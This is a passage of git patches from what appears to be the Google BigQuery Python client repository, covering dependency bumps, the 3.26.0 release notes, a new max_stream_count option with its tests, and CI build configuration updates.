diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index aa2ccfc28..e51d3d8c9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -13,8 +13,8 @@ geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.19.2 -google-auth==2.34.0 +google-api-core==2.20.0 +google-auth==2.35.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 @@ -31,7 +31,7 @@ packaging===24.0; python_version == '3.7' packaging==24.1; python_version >=
'3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index f18db407e..c1aac4bac 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -7,4 +7,4 @@ ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 0b906c4ea..c25253e96 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -10,4 +10,4 @@ matplotlib===3.7.4; python_version == '3.8' matplotlib==3.9.2; python_version >= '3.9' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' From a76af359525ef3c49c958663f81fd24c9d35e1e7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 25 Sep 2024 15:47:57 -0400 Subject: [PATCH 016/202] chore(deps): bump fiona from 1.9.6 to 1.10.0 in /samples/geography (#2027) * chore(deps): bump fiona from 1.9.6 to 1.10.0 in /samples/geography Bumps [fiona](https://github.com/Toblerity/Fiona) from 1.9.6 to 1.10.0. - [Release notes](https://github.com/Toblerity/Fiona/releases) - [Changelog](https://github.com/Toblerity/Fiona/blob/main/CHANGES.txt) - [Commits](https://github.com/Toblerity/Fiona/compare/1.9.6...1.10.0) --- updated-dependencies: - dependency-name: fiona dependency-type: direct:production ... 
Signed-off-by: dependabot[bot] * pin fiona to 1.9.6 for python 3.7 --------- Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index e51d3d8c9..cc0f3ad17 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -8,13 +8,14 @@ click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.0 -Fiona==1.9.6 +Fiona===1.9.6; python_version == '3.7' +Fiona==1.10.0; python_version >= '3.8' geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.20.0 -google-auth==2.35.0 +google-api-core==2.19.2 +google-auth==2.34.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 @@ -31,7 +32,7 @@ packaging===24.0; python_version == '3.7' packaging==24.1; python_version >= '3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +pandas==2.2.2; python_version >= '3.9' proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' From cad34f1afe20bc430c631ba9c2b69e442281d08d Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 26 Sep 2024 11:48:45 -0700 Subject: [PATCH 017/202] chore(main): release 3.26.0 (#1973) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 28 ++++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 4a089b8b4..5de99a6ca 100644 --- a/CHANGELOG.md 
+++ b/CHANGELOG.md @@ -5,6 +5,34 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.26.0](https://github.com/googleapis/python-bigquery/compare/v3.25.0...v3.26.0) (2024-09-25) + + +### Features + +* Include LegacyPandasError in init imports ([#2014](https://github.com/googleapis/python-bigquery/issues/2014)) ([3ab5e95](https://github.com/googleapis/python-bigquery/commit/3ab5e95984ad521027a4e1efd9f16767403e668d)) +* Use `bigquery-magics` package for the `%%bigquery` magic ([#1965](https://github.com/googleapis/python-bigquery/issues/1965)) ([60128a5](https://github.com/googleapis/python-bigquery/commit/60128a522375823422f238312521a2ce356d9177)) + + +### Bug Fixes + +* Add docfx to the presubmit configuration and delete docs-presubmit ([#1995](https://github.com/googleapis/python-bigquery/issues/1995)) ([bd83cfd](https://github.com/googleapis/python-bigquery/commit/bd83cfd2eb25cec58d59af8048f5188d748b083d)) +* Add warning when encountering unknown field types ([#1989](https://github.com/googleapis/python-bigquery/issues/1989)) ([8f5a41d](https://github.com/googleapis/python-bigquery/commit/8f5a41d283a965ca161019588d3a3b2947b04b5b)) +* Allow protobuf 5.x; require protobuf >=3.20.2; proto-plus >=1.22.3 ([#1976](https://github.com/googleapis/python-bigquery/issues/1976)) ([57bf873](https://github.com/googleapis/python-bigquery/commit/57bf873474382cc2cb34243b704bc928fa1b64c6)) +* Do not set job timeout extra property if None ([#1987](https://github.com/googleapis/python-bigquery/issues/1987)) ([edcb79c](https://github.com/googleapis/python-bigquery/commit/edcb79ca69dba30d8102abebb9d53bc76e4882ee)) +* Set pyarrow field nullable to False for a BigQuery field in REPEATED mode ([#1999](https://github.com/googleapis/python-bigquery/issues/1999)) ([5352870](https://github.com/googleapis/python-bigquery/commit/5352870283ca7d4652aefc73f12645bcf6e1363c)) + + +### Dependencies + +* Bump min version of google-api-core and google-cloud-core to 2.x 
([#1972](https://github.com/googleapis/python-bigquery/issues/1972)) ([a958732](https://github.com/googleapis/python-bigquery/commit/a958732aed7d9bd51ffde3dc0e6cae9ad7455b54)) + + +### Documentation + +* Add short mode query sample & test ([#1978](https://github.com/googleapis/python-bigquery/issues/1978)) ([ba61a8a](https://github.com/googleapis/python-bigquery/commit/ba61a8ab0da541ba1940211875d7ea2e9e17dfa8)) +* Improve QueryJobConfig.destination docstring ([#2016](https://github.com/googleapis/python-bigquery/issues/2016)) ([1b4cca0](https://github.com/googleapis/python-bigquery/commit/1b4cca0a3cc788a4570705572d5f04172f6b4b24)) + ## [3.25.0](https://github.com/googleapis/python-bigquery/compare/v3.24.0...v3.25.0) (2024-06-17) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index fed077e26..ebc911253 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.25.0" +__version__ = "3.26.0" From 02706e26034570d0307ae47bf7c968945678eeac Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 26 Sep 2024 22:08:28 +0200 Subject: [PATCH 018/202] chore(deps): update all dependencies (#2031) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot Co-authored-by: Leah E. 
Cole <6719667+leahecole@users.noreply.github.com> --- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index c1aac4bac..4652fcdf2 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.2.0 +bigquery_magics==0.3.0 db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c25253e96..c4b75f3db 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.2.0 +bigquery-magics==0.3.0 db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 From e29b987956e5d80541ad9a573e902938a1373bda Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 1 Oct 2024 23:02:18 +0200 Subject: [PATCH 019/202] chore(deps): update all dependencies (#2033) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 12 ++++++------ samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements.txt | 2 +- 5 files changed, 12 insertions(+), 12 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index dafb60b2a..383829d7d 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.25.0 +google-cloud-bigquery==3.26.0 google-auth-oauthlib==1.2.1 diff --git 
a/samples/geography/requirements.txt b/samples/geography/requirements.txt index cc0f3ad17..1089dc195 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -9,14 +9,14 @@ cligj==0.7.2 dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.0 Fiona===1.9.6; python_version == '3.7' -Fiona==1.10.0; python_version >= '3.8' +Fiona==1.10.1; python_version >= '3.8' geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.19.2 -google-auth==2.34.0 -google-cloud-bigquery==3.25.0 +google-api-core==2.20.0 +google-auth==2.35.0 +google-cloud-bigquery==3.26.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 google-crc32c===1.5.0; python_version < '3.9' @@ -32,7 +32,7 @@ packaging===24.0; python_version == '3.7' packaging==24.1; python_version >= '3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' @@ -56,4 +56,4 @@ typing-extensions===4.7.1; python_version == '3.7' typing-extensions==4.12.2; python_version >= '3.8' typing-inspect==0.9.0 urllib3===1.26.18; python_version == '3.7' -urllib3==2.2.2; python_version >= '3.8' +urllib3==2.2.3; python_version >= '3.8' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 4652fcdf2..6386fb6d2 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.3.0 +bigquery_magics==0.4.0 db-dtypes==1.3.0 -google.cloud.bigquery==3.25.0 +google.cloud.bigquery==3.26.0 google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c4b75f3db..7463e1afc 
100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ -bigquery-magics==0.3.0 +bigquery-magics==0.4.0 db-dtypes==1.3.0 -google-cloud-bigquery==3.25.0 +google-cloud-bigquery==3.26.0 google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 9e181d963..65ce0be9f 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.25.0 +google-cloud-bigquery==3.26.0 From 1d8d0a0b0359ae6da5b99fd3fa8cb016b74b8a6c Mon Sep 17 00:00:00 2001 From: Jeff Quinlan-Galper Date: Wed, 9 Oct 2024 03:25:31 -0700 Subject: [PATCH 020/202] Fix typo in legacy docs (#2037) uspported -> supported Co-authored-by: Chalmer Lowe --- docs/bigquery/legacy_proto_types.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/bigquery/legacy_proto_types.rst b/docs/bigquery/legacy_proto_types.rst index bc1e93715..36e9984b9 100644 --- a/docs/bigquery/legacy_proto_types.rst +++ b/docs/bigquery/legacy_proto_types.rst @@ -3,7 +3,7 @@ Legacy proto-based Types for Google Cloud Bigquery v2 API .. warning:: These types are provided for backward compatibility only, and are not maintained - anymore. They might also differ from the types uspported on the backend. It is + anymore. They might also differ from the types supported on the backend. It is therefore strongly advised to migrate to the types found in :doc:`standard_sql`. Also see the :doc:`3.0.0 Migration Guide<../UPGRADING>` for more information. 
From 7372ad659fd3316a602e90f224e9a3304d4c1419 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 10 Oct 2024 05:32:25 -0400 Subject: [PATCH 021/202] feat: updates to allow users to set max_stream_count (#2039) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds a function `determine_requested_streams()` to compare `preserve_order` and the new argument `max_stream_count` to determine how many streams to request. ``` preserve_order (bool): Whether to preserve the order of streams. If True, this limits the number of streams to one (more than one cannot guarantee order). max_stream_count (Union[int, None]): The maximum number of streams allowed. Must be a non-negative number or None, where None indicates the value is unset. If `preserve_order` is True, it takes precedence over `max_stream_count`. ``` Fixes #2030 🦕 --- google/cloud/bigquery/_pandas_helpers.py | 118 +++++++++++++++++++---- tests/unit/test__pandas_helpers.py | 31 ++++++ 2 files changed, 130 insertions(+), 19 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 210ab4875..bf7d10c0f 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -21,13 +21,14 @@ import logging import queue import warnings -from typing import Any, Union +from typing import Any, Union, Optional, Callable, Generator, List from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import schema + try: import pandas # type: ignore @@ -75,7 +76,7 @@ def _to_wkb(v): _to_wkb = _to_wkb() try: - from google.cloud.bigquery_storage import ArrowSerializationOptions + from google.cloud.bigquery_storage_v1.types import ArrowSerializationOptions except ImportError: _ARROW_COMPRESSION_SUPPORT = False else: @@ -816,18 +817,54 @@ def _nowait(futures): def _download_table_bqstorage( - project_id, - table, - bqstorage_client, - 
preserve_order=False, - selected_fields=None, - page_to_item=None, - max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, -): - """Use (faster, but billable) BQ Storage API to construct DataFrame.""" + project_id: str, + table: Any, + bqstorage_client: Any, + preserve_order: bool = False, + selected_fields: Optional[List[Any]] = None, + page_to_item: Optional[Callable] = None, + max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, + max_stream_count: Optional[int] = None, +) -> Generator[Any, None, None]: + """Downloads a BigQuery table using the BigQuery Storage API. + + This method uses the faster, but potentially more expensive, BigQuery + Storage API to download a table as a Pandas DataFrame. It supports + parallel downloads and optional data transformations. + + Args: + project_id (str): The ID of the Google Cloud project containing + the table. + table (Any): The BigQuery table to download. + bqstorage_client (Any): An + authenticated BigQuery Storage API client. + preserve_order (bool, optional): Whether to preserve the order + of the rows as they are read from BigQuery. If True this limits + the number of streams to one and overrides `max_stream_count`. + Defaults to False. + selected_fields (Optional[List[SchemaField]]): + A list of BigQuery schema fields to select for download. If None, + all fields are downloaded. Defaults to None. + page_to_item (Optional[Callable]): An optional callable + function that takes a page of data from the BigQuery Storage API + max_stream_count (Optional[int]): The maximum number of + concurrent streams to use for downloading data. If `preserve_order` + is True, the requested streams are limited to 1 regardless of the + `max_stream_count` value. If 0 or None, then the number of + requested streams will be unbounded. Defaults to None. + + Yields: + pandas.DataFrame: Pandas DataFrames, one for each chunk of data + downloaded from BigQuery. + + Raises: + ValueError: If attempting to read from a specific partition or snapshot. 
+ + Note: + This method requires the `google-cloud-bigquery-storage` library + to be installed. + """ - # Passing a BQ Storage client in implies that the BigQuery Storage library - # is available and can be imported. from google.cloud import bigquery_storage if "$" in table.table_id: @@ -837,10 +874,11 @@ def _download_table_bqstorage( if "@" in table.table_id: raise ValueError("Reading from a specific snapshot is not currently supported.") - requested_streams = 1 if preserve_order else 0 + requested_streams = determine_requested_streams(preserve_order, max_stream_count) - requested_session = bigquery_storage.types.ReadSession( - table=table.to_bqstorage(), data_format=bigquery_storage.types.DataFormat.ARROW + requested_session = bigquery_storage.types.stream.ReadSession( + table=table.to_bqstorage(), + data_format=bigquery_storage.types.stream.DataFormat.ARROW, ) if selected_fields is not None: for field in selected_fields: @@ -848,7 +886,8 @@ def _download_table_bqstorage( if _ARROW_COMPRESSION_SUPPORT: requested_session.read_options.arrow_serialization_options.buffer_compression = ( - ArrowSerializationOptions.CompressionCodec.LZ4_FRAME + # CompressionCodec(1) -> LZ4_FRAME + ArrowSerializationOptions.CompressionCodec(1) ) session = bqstorage_client.create_read_session( @@ -884,7 +923,7 @@ def _download_table_bqstorage( elif max_queue_size is None: max_queue_size = 0 # unbounded - worker_queue = queue.Queue(maxsize=max_queue_size) + worker_queue: queue.Queue[int] = queue.Queue(maxsize=max_queue_size) with concurrent.futures.ThreadPoolExecutor(max_workers=total_streams) as pool: try: @@ -910,7 +949,7 @@ def _download_table_bqstorage( # we want to block on the queue's get method, instead. This # prevents the queue from filling up, because the main thread # has smaller gaps in time between calls to the queue's get - # method. For a detailed explaination, see: + # method. 
For a detailed explanation, see: # https://friendliness.dev/2019/06/18/python-nowait/ done, not_done = _nowait(not_done) for future in done: @@ -949,6 +988,7 @@ def download_arrow_bqstorage( preserve_order=False, selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, + max_stream_count=None, ): return _download_table_bqstorage( project_id, @@ -958,6 +998,7 @@ def download_arrow_bqstorage( selected_fields=selected_fields, page_to_item=_bqstorage_page_to_arrow, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) @@ -970,6 +1011,7 @@ def download_dataframe_bqstorage( preserve_order=False, selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, + max_stream_count=None, ): page_to_item = functools.partial(_bqstorage_page_to_dataframe, column_names, dtypes) return _download_table_bqstorage( @@ -980,6 +1022,7 @@ def download_dataframe_bqstorage( selected_fields=selected_fields, page_to_item=page_to_item, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) @@ -1024,3 +1067,40 @@ def verify_pandas_imports(): raise ValueError(_NO_PANDAS_ERROR) from pandas_import_exception if db_dtypes is None: raise ValueError(_NO_DB_TYPES_ERROR) from db_dtypes_import_exception + + +def determine_requested_streams( + preserve_order: bool, + max_stream_count: Union[int, None], +) -> int: + """Determines the value of requested_streams based on the values of + `preserve_order` and `max_stream_count`. + + Args: + preserve_order (bool): Whether to preserve the order of streams. If True, + this limits the number of streams to one. `preserve_order` takes + precedence over `max_stream_count`. + max_stream_count (Union[int, None]]): The maximum number of streams + allowed. Must be a non-negative number or None, where None indicates + the value is unset. NOTE: if `preserve_order` is also set, it takes + precedence over `max_stream_count`, thus to ensure that `max_stream_count` + is used, ensure that `preserve_order` is None. 
+ + Returns: + (int) The appropriate value for requested_streams. + """ + + if preserve_order: + # If preserve order is set, it takes precendence. + # Limit the requested streams to 1, to ensure that order + # is preserved) + return 1 + + elif max_stream_count is not None: + # If preserve_order is not set, only then do we consider max_stream_count + if max_stream_count <= -1: + raise ValueError("max_stream_count must be non-negative OR None") + return max_stream_count + + # Default to zero requested streams (unbounded). + return 0 diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 203cc1d1c..3a5fddacc 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -18,6 +18,7 @@ import functools import operator import queue +from typing import Union from unittest import mock import warnings @@ -46,6 +47,7 @@ from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import schema +from google.cloud.bigquery._pandas_helpers import determine_requested_streams pyarrow = _versions_helpers.PYARROW_VERSIONS.try_import() @@ -2053,3 +2055,32 @@ def test_verify_pandas_imports_no_db_dtypes(module_under_test, monkeypatch): monkeypatch.setattr(module_under_test, "db_dtypes", None) with pytest.raises(ValueError, match="Please install the 'db-dtypes' package"): module_under_test.verify_pandas_imports() + + +@pytest.mark.parametrize( + "preserve_order, max_stream_count, expected_requested_streams", + [ + # If preserve_order is set/True, it takes precedence: + (True, 10, 1), # use 1 + (True, None, 1), # use 1 + # If preserve_order is not set check max_stream_count: + (False, 10, 10), # max_stream_count (X) takes precedence + (False, None, 0), # Unbounded (0) when both are unset + ], +) +def test_determine_requested_streams( + preserve_order: bool, + max_stream_count: Union[int, None], + expected_requested_streams: int, +): + """Tests various 
combinations of preserve_order and max_stream_count.""" + actual_requested_streams = determine_requested_streams( + preserve_order, max_stream_count + ) + assert actual_requested_streams == expected_requested_streams + + +def test_determine_requested_streams_invalid_max_stream_count(): + """Tests that a ValueError is raised if max_stream_count is negative.""" + with pytest.raises(ValueError): + determine_requested_streams(preserve_order=False, max_stream_count=-1) From 7b03d61b8bc848fa2fd2722ca5e2c628e2f76eac Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Fri, 1 Nov 2024 10:18:55 -0400 Subject: [PATCH 022/202] build: use multiScm for Kokoro release builds (#2049) Source-Link: https://github.com/googleapis/synthtool/commit/0da16589204e7f61911f64fcb30ac2d3b6e59b31 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:5cddfe2fb5019bbf78335bc55f15bc13e18354a56b3ff46e1834f8e540807f05 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 +- .github/release-trigger.yml | 1 + .kokoro/docker/docs/requirements.txt | 42 +- .kokoro/docs/common.cfg | 2 +- .kokoro/release.sh | 2 +- .kokoro/release/common.cfg | 8 +- .kokoro/requirements.txt | 610 +++++++++---------- .kokoro/samples/python3.13/common.cfg | 40 ++ .kokoro/samples/python3.13/continuous.cfg | 6 + .kokoro/samples/python3.13/periodic-head.cfg | 11 + .kokoro/samples/python3.13/periodic.cfg | 6 + .kokoro/samples/python3.13/presubmit.cfg | 6 + .kokoro/test-samples-impl.sh | 3 +- CONTRIBUTING.rst | 6 +- samples/desktopapp/noxfile.py | 2 +- samples/geography/noxfile.py | 2 +- samples/magics/noxfile.py | 2 +- samples/notebooks/noxfile.py | 2 +- samples/snippets/noxfile.py | 2 +- 19 files changed, 398 insertions(+), 359 deletions(-) create mode 100644 .kokoro/samples/python3.13/common.cfg create mode 100644 .kokoro/samples/python3.13/continuous.cfg create mode 100644 .kokoro/samples/python3.13/periodic-head.cfg create mode 100644 
.kokoro/samples/python3.13/periodic.cfg create mode 100644 .kokoro/samples/python3.13/presubmit.cfg diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 597e0c326..7672b49b6 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:e8dcfd7cbfd8beac3a3ff8d3f3185287ea0625d859168cc80faccfc9a7a00455 -# created: 2024-09-16T21:04:09.091105552Z + digest: sha256:5cddfe2fb5019bbf78335bc55f15bc13e18354a56b3ff46e1834f8e540807f05 +# created: 2024-10-31T01:41:07.349286254Z diff --git a/.github/release-trigger.yml b/.github/release-trigger.yml index d4ca94189..4bb79e58e 100644 --- a/.github/release-trigger.yml +++ b/.github/release-trigger.yml @@ -1 +1,2 @@ enabled: true +multiScmName: diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 7129c7715..66eacc82f 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -4,39 +4,39 @@ # # pip-compile --allow-unsafe --generate-hashes requirements.in # -argcomplete==3.4.0 \ - --hash=sha256:69a79e083a716173e5532e0fa3bef45f793f4e61096cf52b5a42c0211c8b8aa5 \ - --hash=sha256:c2abcdfe1be8ace47ba777d4fce319eb13bf8ad9dace8d085dcad6eded88057f +argcomplete==3.5.1 \ + --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ + --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 # via nox colorlog==6.8.2 \ --hash=sha256:3e3e079a41feb5a1b64f978b5ea4f46040a94f11f0e8bbb8261e3dbbeca64d44 \ --hash=sha256:4dcbb62368e2800cb3c5abd348da7e53f6c362dda502ec27c560b2e58a66bd33 # via nox -distlib==0.3.8 \ - --hash=sha256:034db59a0b96f8ca18035f36290806a9a6e6bd9d1ff91e45a7f172eb17e51784 \ - --hash=sha256:1530ea13e350031b6312d8580ddb6b27a104275a31106523b8f123787f494f64 +distlib==0.3.9 \ + --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 
\ + --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 # via virtualenv -filelock==3.15.4 \ - --hash=sha256:2207938cbc1844345cb01a5a95524dae30f0ce089eba5b00378295a17e3e90cb \ - --hash=sha256:6ca1fffae96225dab4c6eaf1c4f4f28cd2568d3ec2a44e15a08520504de468e7 +filelock==3.16.1 \ + --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ + --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 # via virtualenv -nox==2024.4.15 \ - --hash=sha256:6492236efa15a460ecb98e7b67562a28b70da006ab0be164e8821177577c0565 \ - --hash=sha256:ecf6700199cdfa9e5ea0a41ff5e6ef4641d09508eda6edb89d9987864115817f +nox==2024.10.9 \ + --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ + --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 # via -r requirements.in packaging==24.1 \ --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ --hash=sha256:5b8f2217dbdbd2f7f384c41c628544e6d52f2d0f53c6d0c3ea61aa5d1d7ff124 # via nox -platformdirs==4.2.2 \ - --hash=sha256:2d7a1657e36a80ea911db832a8a6ece5ee53d8de21edd5cc5879af6530b1bfee \ - --hash=sha256:38b7b51f512eed9e84a22788b4bce1de17c0adb134d6becb09836e37d8654cd3 +platformdirs==4.3.6 \ + --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ + --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv -tomli==2.0.1 \ - --hash=sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc \ - --hash=sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f +tomli==2.0.2 \ + --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ + --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed # via nox -virtualenv==20.26.3 \ - --hash=sha256:4c43a2a236279d9ea36a0d76f98d84bd6ca94ac4e0f4a3b9d46d05e10fea542a \ - 
--hash=sha256:8cc4a31139e796e9a7de2cd5cf2489de1217193116a8fd42328f1bd65f434589 +virtualenv==20.26.6 \ + --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ + --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 # via nox diff --git a/.kokoro/docs/common.cfg b/.kokoro/docs/common.cfg index 41b86fc29..76ae5f13b 100644 --- a/.kokoro/docs/common.cfg +++ b/.kokoro/docs/common.cfg @@ -63,4 +63,4 @@ before_action { keyname: "docuploader_service_account" } } -} \ No newline at end of file +} diff --git a/.kokoro/release.sh b/.kokoro/release.sh index 453d6f702..65deb5ed3 100755 --- a/.kokoro/release.sh +++ b/.kokoro/release.sh @@ -23,7 +23,7 @@ python3 -m releasetool publish-reporter-script > /tmp/publisher-script; source / export PYTHONUNBUFFERED=1 # Move into the package, build the distribution and upload. -TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-2") +TWINE_PASSWORD=$(cat 